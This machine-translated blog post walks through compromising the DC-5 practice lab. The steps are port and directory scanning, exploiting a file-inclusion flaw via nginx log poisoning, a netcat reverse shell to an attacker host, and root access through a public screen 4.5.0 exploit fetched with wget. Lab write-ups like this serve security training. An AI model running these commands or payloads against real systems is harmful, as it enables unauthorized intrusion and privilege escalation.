当前位置:网站首页>【DC-5 Range Penetration】
【DC-5 Range Penetration】
2022-08-03 05:50:00 【A piece of paper - barren】
前言
DC-5 Is one who has a file contains loopholes range,So how do we find file inclusion vulnerabilities and use them to bounce back?shell,How about raising the right again??
一、nmap,dirb扫描
The first step in penetration testing must be information gathering.Common jobs arenmap,dirb等.
For the known range addresses192.168.0.102
可正常访问
使用nmap扫描开放的端口
nmap -sT -p- --min-rate 2000 192.168.0.102
再用dirbScan for hidden files
dirb http://192.168.0.102 /usr/share/wordlists/dirb/big.txt -X .php,.txt
Scan to the followingphp文件
其中只有footer.php和thankyou.php在页面中没有显示
并且在contact页面submitvisible after submissionthankyou.php
所以只有footer.php文件没有显示
查看一下
Note that the content of this page has also appeared in another place
footer.phpIndependently displayed content is displayed inthankyou.php页面上,Can guess whetherthankyou.php文件包含了footer.php文件,But I don't know if there is actually a file containing,and availability.
二、Fuzzy testing
so go aheadFuzzy testing
wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt http://192.168.0.102/thankyou.php?FUZZ=FUZ2Z
查看结果
尝试file参数
文件包含成功,The file contains the vulnerability and it is also found
三、文件包含漏洞利用
可以利用在liunx日志中写入php代码,Create a command execution vulnerability
liunxThe default path of the login log is
/var/log/nginx/access.log
包含日志文件bp抓包写入php代码
再通过在url中提交cmd参数值,进行命令执行
http://192.168.0.102/thankyou.php?file=/var/log/nginx/access.log&cmd=ls
查看页面源代码
命令执行成功
四、shell反弹
利用命令执行反弹shell
Because they are all in the internal network, there is no need to use public network port mapping,监听端口
kali监听8001端口
nc -lvp 8001
url:http://192.168.0.102/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.0.107 8001 -e /bin/bash
kali上shell反弹成功
页面优化
python -c 'import pty;pty.spawn("/bin/bash")'
五、提权
尝试sudo提权
sudo -l
不可行
查看etc/passwd 和计划任务 /etc/crontab,都没有发现
查看suidA right way
find / -user root -perm -4000 -print 2>/dev/null
Compare with your own
发现/bin/screen-4.5.0有点奇怪
View the presence of elevated privileges module
searchsploit screen 4.5.0
Download Privilege Escalation Module
searchsploit -m 41152
searchsploit -m 41154
然后开启一个web服务,Upload the available modules
在靶机端,进入/tmp目录,利用wget 下载模块
python3 -m http.server 80
wget http://192.168.0.107/41154.sh
Give the module executable permission
chmod +x 41154.sh
再运行 41154.sh
但是报错,Probably because of the target dronegcc环境不行,Can't run module,we can in ourselveskaliThe host running before you upload them on target
创建一个新的目录baby,将41154.shmove in and run
查看/tmp中生成的文件
Upload these two files to the target drone
都加上可执行权限
再运行
./rootshell
./41154.sh
可获得root权限
总结
以上是DC-5 The range of the whole process of penetration,It is also a very classic penetration process.,希望对大家有帮助.
边栏推荐
猜你喜欢
随机推荐
Oracle null 有哪些注意事项【面试题】
mysql 客户端SSL错误2026 (HY000)
spark sql 报错 Can‘t zip RDDs with unequal numbers of partitions
中国生产力促进中心”十四五”规划与发展规模分析报告2022~2028年
优雅的拦截TabLayout的点击事件
中国人造金刚石行业投资战略规划及发展前景预测报告2022~2028年
Oracle 日历表详解(含节假日)
磁盘空间管理
Oracle 密码策略详解
【IDEA】字体修改-护眼主题-文件注释头设置
Browser multi-threaded off-screen rendering, compression and packaging scheme
MySQL 下载和安装详解
Django从入门到放弃三 -- cookie,session,cbv加装饰器,ajax,django中间件,redis缓存等
自定义封装组件-国际化-下拉搜索
Navicat 解决隔一段时间不操作出现延时卡顿问题
经典论文-ResNet
初识C语言
Let small program development into ` tailwind jit ` era
MySQL 索引详解和什么时候创建索引什么时候不适用索引
ansible的安装和部署详细过程,配置清单基本操作